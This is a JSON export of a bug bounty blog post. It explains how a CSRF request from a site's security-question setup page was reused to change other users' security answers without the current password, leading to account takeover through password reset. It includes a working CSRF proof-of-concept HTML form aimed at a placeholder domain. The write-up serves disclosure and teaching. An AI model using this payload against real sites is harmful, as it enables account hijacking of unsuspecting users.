{"id":4286,"date":"2020-03-11T17:07:28","date_gmt":"2020-03-11T11:37:28","guid":{"rendered":"https:\/\/ninadmathpati.com\/?p=4286"},"modified":"2020-12-15T16:38:10","modified_gmt":"2020-12-15T16:38:10","slug":"how-i-was-able-to-bypass-the-current-password","status":"publish","type":"post","link":"https:\/\/ninadmathpati.com\/hi\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/","title":{"rendered":"How I was able to bypass the current password?"},"content":{"rendered":"

Hello Guys,<\/p>\n\n\n\n

Hope you are earning a lot through bug bounty, Now, a day’s I feel bug bounty is all about bypassing the remediation implemented. Thought to share one of my recent findings, As it’s a private program, let’s call it as some Xyz.com <\/p>\n\n\n\n

Most of them might have gone through this scenario, while we update the password or update the security question and answer, there the server asks to confirm the user’s identity by asking him to re-enter his password to save or update the changes.<\/p>\n\n\n\n

Here I was able to bypass the confirm password,<\/p>\n\n\n\n

In this scenario what most of them would try,<\/p>\n\n\n\n

  1. Check whether the password is properly validated?<\/em><\/li>
  2. Try removing the old password parameter through burp suite <\/em><\/li>
  3. Try providing different user’s password.<\/em><\/li>
  4. Response manipulation.<\/em><\/li>
  5. SQL injection.<\/em><\/li><\/ol>\n\n\n\n

    In my case, any of the above were not working,<\/p>\n\n\n\n

    \n
    \n\"Not<\/a>\n<\/div><\/figure>\n<\/div><\/div>\n\n\n\n

    <\/p>\n\n\n\n

    As, I knew that application had CSRF tokens, that were easily bypassed by removing the token. But as the confirm current Password was implemented the CSRF also could not help there.<\/p>\n\n\n\n

    Then, I created a new account and after logging in then I was asked to create a security question and answer, I captured CSRF for that request and the CSRF was something like this,<\/p>\n\n\n\n

    CSRF<\/em><\/strong><\/p>\n\n\n\n

    <html>\n<body>\n<script>history.pushState('', '', '\/')<\/script>\n<form action="https:\/\/xyz.com\/myprofile\/editLogin" method="POST" data-trp-original-action="https:\/\/xyz.com\/myprofile\/editLogin">\n<input type="hidden" name="question" value="PET" \/>\n<input type="hidden" name="answer" value="test1234" \/>\n<input type="hidden" name="answer2" value="test1234" \/>\n<input type="hidden" name="saveSubmit" value="Save&#32;and&#32;Continue" \/>\n<input type="hidden" name="origin" value="loginAccount" \/>\n<input type="hidden" name="requestor" value="accountSummary" \/>\n<input type="hidden" name="loginPage" value="false" \/>\n<input type="hidden" name="securityQAPage" value="true" \/>\n<input type="submit" value="Submit request" \/>\n<input type="hidden" name="trp-form-language" value="hi"\/><\/form>\n<\/body>\n<\/html><\/code><\/pre>\n\n\n\n
    The CSRF request was different for updating the security Q &A and for creating the security Q&A. So as for the 1st time the user is creating the security question and password, So here no need to provide the current<\/em><\/strong> password<\/em><\/strong> to make changes, Then why not use this CSRF to update the security question, When I tried to update the security question and answer of the other user, it worked, Thus I was successful in bypassing the current password option.<\/p>\n\n\n\n
    \n\"Russell<\/a>\n<\/div><\/figure>\n\n\n\n
    <\/p>\n\n\n\n
    I was able to change anyone’s, security question,<\/p>\n\n\n\n
    Through this vulnerability, I was able to do a full account takeover, As on the forgot password page there was an option to reset the password by answering the security question.<\/p>\n\n\n\n
    Thus it was full account takeover.<\/p>\n\n\n\n
    This was a short blog as my server-side vulnerabilities<\/strong> blog would take some time.<\/p>\n\n\n\n
    Hope you like it!<\/p>","protected":false},"excerpt":{"rendered":"
    Hello Guys, Hope you are earning a lot through bug bounty, Now, a day’s I feel bug bounty is all about bypassing the remediation implemented. Thought to share one of my recent findings, As it’s a private program, let’s call it as some Xyz.com  Most of them might have gone through this scenario, while we…<\/p>\n
    Read More<\/a><\/p>","protected":false},"author":1,"featured_media":4382,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[34],"tags":[],"yoast_head":"\nHow I was able to bypass the current password? - Ninad Mathpati<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/ninadmathpati.com\/hi\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/\" \/>\n<meta property=\"og:locale\" content=\"hi_IN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"How I was able to bypass the current password? - Ninad Mathpati\" \/>\n<meta property=\"og:description\" content=\"Hello Guys, Hope you are earning a lot through bug bounty, Now, a day’s I feel bug bounty is all about bypassing the remediation implemented. Thought to share one of my recent findings, As it’s a private program, let’s call it as some Xyz.com  Most of them might have gone through this scenario, while we...Read More\" \/>\n<meta property=\"og:url\" content=\"https:\/\/ninadmathpati.com\/hi\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/\" \/>\n<meta property=\"og:site_name\" content=\"Ninad Mathpati\" \/>\n<meta property=\"article:published_time\" content=\"2020-03-11T11:37:28+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-15T16:38:10+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/ninadmathpati.com\/wp-content\/uploads\/2020\/03\/confirmpassword-300x273-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"273\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Ninad Mathpati\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ninad_mathpati\" \/>\n<meta name=\"twitter:site\" content=\"@ninad_mathpati\" \/>\n<meta name=\"twitter:label1\" content=\"\u0926\u094d\u0935\u093e\u0930\u093e \u0932\u093f\u0916\u093f\u0924\" \/>\n\t<meta name=\"twitter:data1\" content=\"Ninad Mathpati\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u0905\u0928\u0941\u092e\u093e\u0928\u093f\u0924 \u092a\u0922\u093c\u0928\u0947 \u0915\u093e \u0938\u092e\u092f\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 \u092e\u093f\u0928\u091f\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/ninadmathpati.com\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/ninadmathpati.com\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/\"},\"author\":{\"name\":\"Ninad Mathpati\",\"@id\":\"https:\/\/ninadmathpati.com\/#\/schema\/person\/f19cd13cb1ebac284a486cd18056766a\"},\"headline\":\"How I was able to bypass the current password?\",\"datePublished\":\"2020-03-11T11:37:28+00:00\",\"dateModified\":\"2020-12-15T16:38:10+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/ninadmathpati.com\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/\"},\"wordCount\":390,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/ninadmathpati.com\/#\/schema\/person\/f19cd13cb1ebac284a486cd18056766a\"},\"articleSection\":[\"Bug Bounty\"],\"inLanguage\":\"hi-IN\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/ninadmathpati.com\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/ninadmathpati.com\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/\",\"url\":\"https:\/\/ninadmathpati.com\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/\",\"name\":\"How I was able to bypass the current password? - Ninad Mathpati\",\"isPartOf\":{\"@id\":\"https:\/\/ninadmathpati.com\/#website\"},\"datePublished\":\"2020-03-11T11:37:28+00:00\",\"dateModified\":\"2020-12-15T16:38:10+00:00\",\"inLanguage\":\"hi-IN\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/ninadmathpati.com\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/\"]}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/ninadmathpati.com\/#website\",\"url\":\"https:\/\/ninadmathpati.com\/\",\"name\":\"Ninad Mathpati\",\"description\":\"Security Consultant\",\"publisher\":{\"@id\":\"https:\/\/ninadmathpati.com\/#\/schema\/person\/f19cd13cb1ebac284a486cd18056766a\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/ninadmathpati.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"hi-IN\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/ninadmathpati.com\/#\/schema\/person\/f19cd13cb1ebac284a486cd18056766a\",\"name\":\"Ninad Mathpati\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hi-IN\",\"@id\":\"https:\/\/ninadmathpati.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/ninadmathpati.com\/wp-content\/uploads\/2020\/07\/IMG-1632123.jpg\",\"contentUrl\":\"https:\/\/ninadmathpati.com\/wp-content\/uploads\/2020\/07\/IMG-1632123.jpg\",\"width\":851,\"height\":1093,\"caption\":\"Ninad Mathpati\"},\"logo\":{\"@id\":\"https:\/\/ninadmathpati.com\/#\/schema\/person\/image\/\"},\"sameAs\":[\"https:\/\/ninadmathpati.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"How I was able to bypass the current password? - Ninad Mathpati","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/ninadmathpati.com\/hi\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/","og_locale":"hi_IN","og_type":"article","og_title":"How I was able to bypass the current password? - Ninad Mathpati","og_description":"Hello Guys, Hope you are earning a lot through bug bounty, Now, a day’s I feel bug bounty is all about bypassing the remediation implemented. Thought to share one of my recent findings, As it’s a private program, let’s call it as some Xyz.com  Most of them might have gone through this scenario, while we...Read More","og_url":"https:\/\/ninadmathpati.com\/hi\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/","og_site_name":"Ninad Mathpati","article_published_time":"2020-03-11T11:37:28+00:00","article_modified_time":"2020-12-15T16:38:10+00:00","og_image":[{"width":300,"height":273,"url":"https:\/\/ninadmathpati.com\/wp-content\/uploads\/2020\/03\/confirmpassword-300x273-1.png","type":"image\/png"}],"author":"Ninad Mathpati","twitter_card":"summary_large_image","twitter_creator":"@ninad_mathpati","twitter_site":"@ninad_mathpati","twitter_misc":{"\u0926\u094d\u0935\u093e\u0930\u093e \u0932\u093f\u0916\u093f\u0924":"Ninad Mathpati","\u0905\u0928\u0941\u092e\u093e\u0928\u093f\u0924 \u092a\u0922\u093c\u0928\u0947 \u0915\u093e \u0938\u092e\u092f":"2 \u092e\u093f\u0928\u091f"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/ninadmathpati.com\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/#article","isPartOf":{"@id":"https:\/\/ninadmathpati.com\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/"},"author":{"name":"Ninad Mathpati","@id":"https:\/\/ninadmathpati.com\/#\/schema\/person\/f19cd13cb1ebac284a486cd18056766a"},"headline":"How I was able to bypass the current password?","datePublished":"2020-03-11T11:37:28+00:00","dateModified":"2020-12-15T16:38:10+00:00","mainEntityOfPage":{"@id":"https:\/\/ninadmathpati.com\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/"},"wordCount":390,"commentCount":0,"publisher":{"@id":"https:\/\/ninadmathpati.com\/#\/schema\/person\/f19cd13cb1ebac284a486cd18056766a"},"articleSection":["Bug Bounty"],"inLanguage":"hi-IN","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/ninadmathpati.com\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/ninadmathpati.com\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/","url":"https:\/\/ninadmathpati.com\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/","name":"How I was able to bypass the current password? - Ninad Mathpati","isPartOf":{"@id":"https:\/\/ninadmathpati.com\/#website"},"datePublished":"2020-03-11T11:37:28+00:00","dateModified":"2020-12-15T16:38:10+00:00","inLanguage":"hi-IN","potentialAction":[{"@type":"ReadAction","target":["https:\/\/ninadmathpati.com\/2020\/03\/11\/how-i-was-able-to-bypass-the-current-password\/"]}]},{"@type":"WebSite","@id":"https:\/\/ninadmathpati.com\/#website","url":"https:\/\/ninadmathpati.com\/","name":"Ninad Mathpati","description":"Security Consultant","publisher":{"@id":"https:\/\/ninadmathpati.com\/#\/schema\/person\/f19cd13cb1ebac284a486cd18056766a"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/ninadmathpati.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"hi-IN"},{"@type":["Person","Organization"],"@id":"https:\/\/ninadmathpati.com\/#\/schema\/person\/f19cd13cb1ebac284a486cd18056766a","name":"Ninad Mathpati","image":{"@type":"ImageObject","inLanguage":"hi-IN","@id":"https:\/\/ninadmathpati.com\/#\/schema\/person\/image\/","url":"https:\/\/ninadmathpati.com\/wp-content\/uploads\/2020\/07\/IMG-1632123.jpg","contentUrl":"https:\/\/ninadmathpati.com\/wp-content\/uploads\/2020\/07\/IMG-1632123.jpg","width":851,"height":1093,"caption":"Ninad Mathpati"},"logo":{"@id":"https:\/\/ninadmathpati.com\/#\/schema\/person\/image\/"},"sameAs":["https:\/\/ninadmathpati.com"]}]}},"_links":{"self":[{"href":"https:\/\/ninadmathpati.com\/hi\/wp-json\/wp\/v2\/posts\/4286"}],"collection":[{"href":"https:\/\/ninadmathpati.com\/hi\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ninadmathpati.com\/hi\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ninadmathpati.com\/hi\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ninadmathpati.com\/hi\/wp-json\/wp\/v2\/comments?post=4286"}],"version-history":[{"count":4,"href":"https:\/\/ninadmathpati.com\/hi\/wp-json\/wp\/v2\/posts\/4286\/revisions"}],"predecessor-version":[{"id":4735,"href":"https:\/\/ninadmathpati.com\/hi\/wp-json\/wp\/v2\/posts\/4286\/revisions\/4735"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/ninadmathpati.com\/hi\/wp-json\/wp\/v2\/media\/4382"}],"wp:attachment":[{"href":"https:\/\/ninadmathpati.com\/hi\/wp-json\/wp\/v2\/media?parent=4286"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ninadmathpati.com\/hi\/wp-json\/wp\/v2\/categories?post=4286"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ninadmathpati.com\/hi\/wp-json\/wp\/v2\/tags?post=4286"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}